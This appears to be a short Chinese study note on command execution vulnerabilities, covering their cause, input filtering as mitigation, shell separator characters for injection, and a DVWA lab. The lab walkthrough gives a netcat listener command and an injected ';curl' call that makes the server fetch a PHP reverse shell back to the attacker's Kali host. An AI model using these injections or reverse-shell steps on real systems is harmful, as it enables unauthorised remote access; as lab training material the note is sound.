命令执行漏洞
漏洞产生原因:程序开发人员直接调用操作系统层面的功能
如何避免:不调用操作系统的功能,或者调用操作系统功能后对用户的输入严格过滤
如何利用:
; | & && \
被过滤后使用对特殊符号编码或者其他方法绕过
实验:
- 开启 kali apache服务
service apache2 start
- 将php-reverse-shell拷贝到kali的www目录下

- 将php-reverse-shell的反弹ip地址和端口修改成攻击者的主机ip地址和端口

- kali攻击者主机侦听1234端口,用来接收反弹shell(nc -nvlp 1234,n表示不只是ip地址不做dns查询,v表示结果可视化,l表示监听进入的连接,p指定端口号)

- 在DVWA的远程代码执行页面上运行;curl http://192.168.43.43/remote_exc.php(curl:在命令行中定制http请求)

- 成功将自己主机的shell反射到nc

这个过程就是通过dvwa访问本机的remote_exc.php,执行php中的代码,将本机的shell反弹到nc。。。。。

浙公网安备 33010602011771号